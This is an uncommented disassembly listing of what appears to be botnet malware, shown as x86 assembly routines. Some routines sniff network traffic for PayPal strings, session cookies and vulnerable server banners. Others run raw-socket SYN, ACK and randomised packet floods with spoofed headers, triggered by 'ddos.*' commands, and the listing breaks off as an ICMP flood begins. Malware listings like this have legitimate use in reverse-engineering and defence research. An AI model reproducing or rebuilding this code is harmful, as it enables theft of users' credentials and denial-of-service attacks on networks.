mov esi, [esp+4+Str]
push offset aHttpSniff ; "HTTP sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_41300F
loc_41300B: ; CODE XREF: sub_412FF5+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_41300F: ; CODE XREF: sub_412FF5+14�j
push offset a0 ; "#0#"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_41300B
push offset aPaypal ; "paypal"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_413035
loc_413031: ; CODE XREF: sub_412FF5+4F�j
; sub_412FF5+60�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_413035: ; CODE XREF: sub_412FF5+3A�j
push offset aPaypal_0 ; "PAYPAL"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_413031
push offset aPaypal_com ; "PAYPAL.COM"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_413031
push offset aPaypal_com_0 ; "paypal.com"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_413031
push offset aSetCookie ; "Set-Cookie:"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412FF5 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41307C(char *Str)
sub_41307C proc near ; CODE XREF: sub_4130E1:loc_4134A6�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aVulnSniff ; "VULN sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_413096
loc_413092: ; CODE XREF: sub_41307C+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_413096: ; CODE XREF: sub_41307C+14�j
push offset a0 ; "#0#"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_413092
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4130BC
loc_4130B8: ; CODE XREF: sub_41307C+4F�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4130BC: ; CODE XREF: sub_41307C+3A�j
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_4130B8
push offset aOpenssh_2 ; "OpenSSH_2"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_41307C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4130E1 proc near ; DATA XREF: sub_401CC7+4276�o
Dst = byte ptr -113B8h
var_113AF = byte ptr -113AFh
var_113AC = dword ptr -113ACh
var_113A8 = dword ptr -113A8h
var_113A4 = dword ptr -113A4h
Str = byte ptr -1138Ch
var_13B8 = byte ptr -13B8h
var_BB8 = byte ptr -0BB8h
var_3B8 = byte ptr -3B8h
var_3B7 = byte ptr -3B7h
Dest = byte ptr -2B8h
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 113B8h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+var_B8]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_3B7]
push 3Fh
mov [eax+90h], esi
pop ecx
xor eax, eax
mov [ebp+var_3B8], bl
push 0FFh
rep stosd
stosw
lea eax, [ebp+var_3B8]
mov [ebp+var_20], 2
push eax
mov [ebp+var_1E], bx
mov [ebp+var_1C], ebx
call dword_4E310C ; gethostname
lea eax, [ebp+var_3B8]
push eax
call dword_4E317C ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx ; Size
push dword ptr [eax] ; Src
lea eax, [ebp+var_8]
push eax ; Dst
call _memcpy
mov eax, [ebp+var_8]
add esp, 0Ch
mov [ebp+var_1C], eax
push ebx
push 3
push 2
call dword_4E3178 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_413187
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_413187: ; CODE XREF: sub_4130E1+9B�j
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call dword_4E3124 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4131FD
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44CA64 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_4131D9
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; Str
push [ebp+var_B8] ; int
call sub_409D34
add esp, 14h
loc_4131D9: ; CODE XREF: sub_4130E1+D6�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
push edi
call dword_4E3190 ; closesocket
push [ebp+var_34]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_4131FD: ; CODE XREF: sub_4130E1+B6�j
push ebx
lea eax, [ebp+var_24]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push 98000001h
push edi
mov [ebp+var_C], esi
call dword_4E30A4 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_413283
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44CA90 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_41325F
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; Str
push [ebp+var_B8] ; int
call sub_409D34
add esp, 14h
loc_41325F: ; CODE XREF: sub_4130E1+15C�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
push edi
call dword_4E3190 ; closesocket
push [ebp+var_34]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_413283: ; CODE XREF: sub_4130E1+13C�j
mov esi, 200h
loc_413288: ; CODE XREF: sub_4130E1+1D6�j
; sub_4130E1+1FB�j ...
mov edi, 0FFFFh
lea eax, [ebp+Dst]
push edi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push ebx
push edi
push eax
push [ebp+var_10]
call dword_4E3110 ; recv
cmp [ebp+var_113AF], 6
jnz short loc_413288
push [ebp+var_113A4]
mov edi, ds:dword_4F5500
call edi ; htons
push [ebp+var_113A4+2]
movzx eax, ax
mov [ebp+arg_0], eax
call edi ; htons
cmp [ebp+arg_0], 6Eh
movzx edi, ax
jz short loc_413288
cmp [ebp+arg_0], 19h
jz short loc_413288
cmp edi, 6Eh
jz short loc_413288
cmp edi, 19h
jz short loc_413288
push [ebp+var_113AC]
call sub_412DD2
pop ecx
push dword ptr [eax]
call ds:dword_4F5504 ; inet_ntoa
push eax
lea eax, [ebp+var_13B8]
push offset aS_34 ; "%s"
push eax ; Dest
call _sprintf
push [ebp+var_113A8]
call sub_412DD2
add esp, 10h
push dword ptr [eax]
call ds:dword_4F5504 ; inet_ntoa
push eax
lea eax, [ebp+var_BB8]
push offset aS_35 ; "%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
mov [ebp+var_4], ebx
push eax ; Str
call _strlen
add esp, 10h
test eax, eax
jle short loc_413386
loc_413352: ; CODE XREF: sub_4130E1+2A3�j
mov eax, [ebp+var_4]
cmp [ebp+eax+Str], 0Dh
lea eax, [ebp+eax+Str]
jnz short loc_413369
mov byte ptr [eax], 20h
loc_413369: ; CODE XREF: sub_4130E1+283�j
cmp byte ptr [eax], 0Ah
jnz short loc_413371
mov byte ptr [eax], 20h
loc_413371: ; CODE XREF: sub_4130E1+28B�j
inc [ebp+var_4]
lea eax, [ebp+Str]
push eax ; Str
call _strlen
cmp [ebp+var_4], eax
pop ecx
jl short loc_413352
loc_413386: ; CODE XREF: sub_4130E1+26F�j
cmp [ebp+arg_0], 50h
jz loc_413439
cmp edi, 50h
jz loc_413439
lea eax, [ebp+Str]
push eax ; Str
call sub_412DE1
test al, al
pop ecx
jz short loc_4133CD
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_44CAC8
jmp loc_413468
; ---------------------------------------------------------------------------
loc_4133CD: ; CODE XREF: sub_4130E1+2C7�j
cmp edi, 50h
jz short loc_413439
lea eax, [ebp+Str]
push eax ; Str
call sub_412EF8
test al, al
pop ecx
jz short loc_413403
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_44CAFC
jmp short loc_413468
; ---------------------------------------------------------------------------
loc_413403: ; CODE XREF: sub_4130E1+300�j
cmp edi, 50h
jz short loc_413439
lea eax, [ebp+Str]
push eax ; Str
call sub_412F6E
test al, al
pop ecx
jz short loc_413439
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_44CB30
jmp short loc_413468
; ---------------------------------------------------------------------------
loc_413439: ; CODE XREF: sub_4130E1+2A9�j
; sub_4130E1+2B2�j ...
lea eax, [ebp+Str]
push eax ; Str
call sub_412FF5
test al, al
pop ecx
lea eax, [ebp+Str]
push eax
jz short loc_4134A6
lea eax, [ebp+var_BB8]
push edi
push eax
lea eax, [ebp+var_13B8]
push [ebp+arg_0]
push eax
push offset asc_44CB64 ; "-"
loc_413468: ; CODE XREF: sub_4130E1+2E7�j
; sub_4130E1+320�j ...
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 20h
cmp [ebp+var_2C], ebx
jnz loc_413288
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; Str
push [ebp+var_B8] ; int
call sub_409D34
add esp, 14h
jmp loc_413288
; ---------------------------------------------------------------------------
loc_4134A6: ; CODE XREF: sub_4130E1+36E�j
call sub_41307C
test al, al
pop ecx
jz loc_413288
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_44CB9C
jmp short loc_413468
sub_4130E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4134D4 proc near ; DATA XREF: sub_401CC7+65C3�o
Dest = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = dword ptr -18Ch
Str = byte ptr -10Ch
Str1 = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
lea eax, [ebp+var_18C]
push eax ; int
lea eax, [ebp+Str1]
push eax ; Str1
lea eax, [ebp+var_20C]
push eax ; Str
lea eax, [ebp+var_28C]
push eax ; int
call sub_4138C0
add esp, 14h
push eax
lea eax, [ebp+Dest]
push offset asc_44CBD4 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_413567
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_294] ; int
call sub_409D34
add esp, 14h
loc_413567: ; CODE XREF: sub_4134D4+71�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_290]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_4134D4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_413589(int,int,char *Str1,int,int)
sub_413589 proc near ; CODE XREF: sub_4138C0+40�p
var_284 = byte ptr -284h
Dest = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
Dst = byte ptr -8Ch
Src = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Str1 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_4E3068 ; WSAStartup
test eax, eax
jz short loc_4135C9
xor eax, eax
jmp loc_4138BC
; ---------------------------------------------------------------------------
loc_4135C9: ; CODE XREF: sub_413589+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4E319C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4138B4
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call dword_4E30D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4138AA
push [ebp+arg_C]
mov [ebp+var_58], 2
call dword_4E30F8 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call dword_4E30F8 ; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call dword_4E30F8 ; htons
mov [ebp+var_12], ax
call _rand
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_4E30F8 ; htons
push 12345678h
mov [ebp+var_14], ax
call dword_4E30F4 ; htonl
push offset aDdos_syn_0 ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_413699
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_4136ED
; ---------------------------------------------------------------------------
loc_413699: ; CODE XREF: sub_413589+105�j
push offset aDdos_ack_0 ; "ddos.ack"
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4136B5
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_4136ED
; ---------------------------------------------------------------------------
loc_4136B5: ; CODE XREF: sub_413589+121�j
push offset aDdos_random_0 ; "ddos.random"
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4136ED
call _rand
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call _rand
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_4136ED: ; CODE XREF: sub_413589+10E�j
; sub_413589+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call dword_4E30F8 ; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+Str1], ebx
call ds:dword_4F540C ; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call ds:dword_4F5408 ; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call __allmul
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_41373B: ; CODE XREF: sub_413589+2E2�j
; sub_413589+2F0�j
mov [ebp+var_4], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_4E30F8 ; htons
mov [ebp+var_14], ax
call _rand
mov edi, eax
shl edi, 10h
call _rand
or edi, eax
push edi
call dword_4E30F8 ; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_4E30F4 ; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_4E30F8 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+Src], eax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AFCA
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AFCA
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call dword_4E315C ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_41387E
add [ebp+Str1], eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_4F5408 ; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4138A7
jl loc_41373B
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_4138A7
jmp loc_41373B
; ---------------------------------------------------------------------------
loc_41387E: ; CODE XREF: sub_413589+2CB�j
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44CC20 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 10h
jmp short loc_4138AA
; ---------------------------------------------------------------------------
loc_4138A7: ; CODE XREF: sub_413589+2E0�j
; sub_413589+2EE�j
mov ebx, [ebp+Str1]
loc_4138AA: ; CODE XREF: sub_413589+78�j
; sub_413589+31C�j
push [ebp+var_20]
call dword_4E3190 ; closesocket
pop esi
loc_4138B4: ; CODE XREF: sub_413589+5B�j
call dword_4E3050 ; WSACleanup
mov eax, ebx
loc_4138BC: ; CODE XREF: sub_413589+3B�j
pop edi
pop ebx
leave
retn
sub_413589 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4138C0(int,char *Str,char *Str1,int)
sub_4138C0 proc near ; CODE XREF: sub_4134D4+4F�p
arg_0 = dword ptr 4
Str = dword ptr 8
Str1 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AE55
push [esp+10h+Str] ; Str
mov esi, eax
call _atoi
push [esp+14h+arg_C] ; Str
mov ebx, eax
call _atoi
mov edi, eax
call _rand
cdq
mov ecx, 200h
push edi ; int
idiv ecx
push ebx ; int
push [esp+20h+Str1] ; Str1
lea eax, [edx+esi+100h]
push eax ; int
push esi ; int
call sub_413589
add esp, 20h
test eax, eax
jnz short loc_41390F
push 1
pop eax
loc_41390F: ; CODE XREF: sub_4138C0+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4138C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41391E proc near ; DATA XREF: sub_401CC7+67A2�o
Dest = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
Str = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call dword_4E3178 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4139B9
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44CC3C ; "-"
push eax ; Dest
call _sprintf
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_41399C
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409D34
add esp, 14h
loc_41399C: ; CODE XREF: sub_41391E+5C�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_38]
call sub_40BA72
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_4139B9: ; CODE XREF: sub_41391E+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call dword_4E30D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_413A30
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44CC68 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_413A13
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409D34
add esp, 14h
loc_413A13: ; CODE XREF: sub_41391E+D3�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_38]
call sub_40BA72
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_413A30: ; CODE XREF: sub_41391E+B3�j
lea eax, [ebp+var_1B8]
push eax
call dword_4E3138 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_413A97
lea eax, [ebp+Dest]
push offset asc_44CC98 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_413A7A
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409D34
add esp, 14h
loc_413A7A: ; CODE XREF: sub_41391E+13A�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_38]
call sub_40BA72
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_413A97: ; CODE XREF: sub_41391E+122�j
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push edi
call dword_4E30F8 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_4E3138 ; inet_addr
mov esi, ds:dword_4F537C
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
loc_413AD5: ; CODE XREF: sub_41391E+2E8�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_413C80
push 41Ch
mov byte_4E5EB0, 45h
call dword_4E30F8 ; htons
cmp [ebp+var_2C], edi
mov word_4E5EB2, ax
mov word_4E5EB4, bx
mov word_4E5EB6, di
mov byte_4E5EB8, 80h
mov byte_4E5EB9, bl
mov word_4E5EBA, di
jz short loc_413B5B
call _rand
mov ebx, eax
shl ebx, 8
call _rand
add ebx, eax
shl ebx, 8
call _rand
add ebx, eax
shl ebx, 8
call _rand
add ebx, eax
push 1
mov dword_4E5EBC, ebx
pop ebx
jmp short loc_413B73
; ---------------------------------------------------------------------------
loc_413B5B: ; CODE XREF: sub_41391E+20B�j
push [ebp+var_1BC]
call sub_40AF71
pop ecx
push eax
call dword_4E3138 ; inet_addr
mov dword_4E5EBC, eax
loc_413B73: ; CODE XREF: sub_41391E+23B�j
mov eax, [ebp+var_18]
mov dword_4E5EC0, eax
call _rand
cdq
mov ecx, 100h
idiv ecx
mov byte_4E5EC4, dl
call _rand
cdq
mov ecx, 100h
idiv ecx
mov byte_4E5EC5, dl
call _rand
cdq
mov ecx, 0F0h
push 400h ; Size
idiv ecx
mov word_4E5EC6, di
mov word_4E5ECA, bx
inc edx
mov word_4E5EC8, dx
call _rand
cdq
mov ecx, 0FFh
idiv ecx
push edx ; Val
push offset dword_4E5ECC ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push 10h
push eax
push edi
push 41Ch
push offset byte_4E5EB0
push [ebp+var_4]
call dword_4E315C ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_413C0B
inc [ebp+arg_0]
jmp loc_413AD5
; ---------------------------------------------------------------------------
loc_413C0B: ; CODE XREF: sub_41391E+2E3�j
push [ebp+var_4]
call dword_4E3190 ; closesocket
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset asc_44CCB8 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_413C63
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409D34
add esp, 14h
loc_413C63: ; CODE XREF: sub_41391E+323�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_38]
call sub_40BA72
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_413C80: ; CODE XREF: sub_41391E+1C8�j
push [ebp+var_4]
call dword_4E3190 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+Dest]
push offset asc_44CD00 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_413CE8
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409D34
add esp, 14h
loc_413CE8: ; CODE XREF: sub_41391E+3A8�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_38]
call sub_40BA72
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
sub_41391E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413D05 proc near ; DATA XREF: sub_401CC7+5590�o
var_10320 = byte ptr -10320h
Dest = byte ptr -344h
var_144 = dword ptr -144h
Str = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Dst = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call dword_4E3080 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_4E3138 ; inet_addr
mov esi, eax
xor ebx, ebx
